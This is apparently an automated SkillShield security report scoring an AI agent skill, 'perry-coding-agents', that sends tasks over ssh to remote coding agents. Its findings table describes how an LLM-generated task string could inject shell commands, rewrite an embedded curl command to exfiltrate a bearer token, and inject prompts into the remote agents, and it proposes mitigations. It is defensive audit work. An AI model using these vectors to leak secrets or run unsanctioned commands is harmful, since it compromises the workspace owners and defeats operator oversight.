Trust Assessment
perry-coding-agents received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 3 high, 0 medium, and 0 low severity. Key findings include Remote Command Injection via LLM-generated task, LLM can exfiltrate secrets via manipulated `curl` command, Skill grants broad remote code execution permissions to LLM.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote Command Injection via LLM-generated task The skill constructs `ssh` commands that execute `opencode run` or `claude` on a remote workspace. The argument to `opencode run` or `claude` is an LLM-generated string (e.g., 'Your task.' or 'Add bearer token auth...'). This allows the LLM to inject arbitrary shell commands into the remote execution context, leading to full compromise of the remote workspace. The examples explicitly show the LLM generating a `curl` command, demonstrating the expectation that the LLM can generate executable code. The LLM should only provide a *description* of the task. The actual execution logic, including any `curl` commands or other shell commands, should be templated and controlled by the host system, with LLM input strictly limited to data fields (e.g., the `text` in the `curl` payload). Implement strict sandboxing and least privilege for the remote workspaces. | LLM | SKILL.md:20 | |
| HIGH | LLM can exfiltrate secrets via manipulated `curl` command The dispatch pattern and examples show a `curl` command embedded within the LLM-generated task string, which includes an `Authorization: Bearer <hooks-token>` (or `<token>`). Since the LLM generates the entire string passed to `opencode run`, it can modify the `curl` command's URL, headers, or body to exfiltrate the `<hooks-token>` or any other sensitive data accessible to the remote agent to an attacker-controlled endpoint. The `curl` command, especially the part containing sensitive tokens, must be constructed by the host system, not the LLM. The LLM's input should be strictly limited to the `text` field of the JSON payload, and this input should be sanitized to prevent injection into the JSON structure itself. Tokens should be securely managed and injected by the host system. | LLM | SKILL.md:25 | |
| HIGH | Skill grants broad remote code execution permissions to LLM The core functionality of this skill is to allow the LLM to dispatch arbitrary coding tasks to remote `perry` workspaces via `ssh` and specialized coding agents (`opencode`, `claude`). This grants the LLM extensive capabilities to execute code, modify files, and interact with the network on these remote environments. While this is the intended purpose, it represents a significant security surface area. Implement robust isolation and sandboxing for all remote workspaces. Ensure workspaces are ephemeral and reset after use. Apply the principle of least privilege to the remote agents, limiting their network access and filesystem scope. Implement comprehensive logging and monitoring of all actions performed by the agents. | LLM | SKILL.md:13 | |
| HIGH | LLM can inject instructions into remote coding agent The `task` argument passed to `opencode run` or `claude` is directly generated by the LLM. This allows the LLM to inject arbitrary instructions or prompts into the remote coding agent, potentially overriding its intended behavior, causing it to perform unintended actions, or manipulating its output. This is a direct prompt injection vector for the remote agent itself, distinct from shell command injection. The remote coding agents (`opencode`, `claude`) should be designed with strong guardrails to prevent prompt injection. Input from the LLM should be treated as untrusted and validated. Consider using structured input formats for tasks rather than free-form text where possible, or implementing a secondary verification step for critical actions. | LLM | SKILL.md:20 |
Scan History
Embed Code
[](https://skillshield.io/report/3aea875334feabc3)
Powered by SkillShield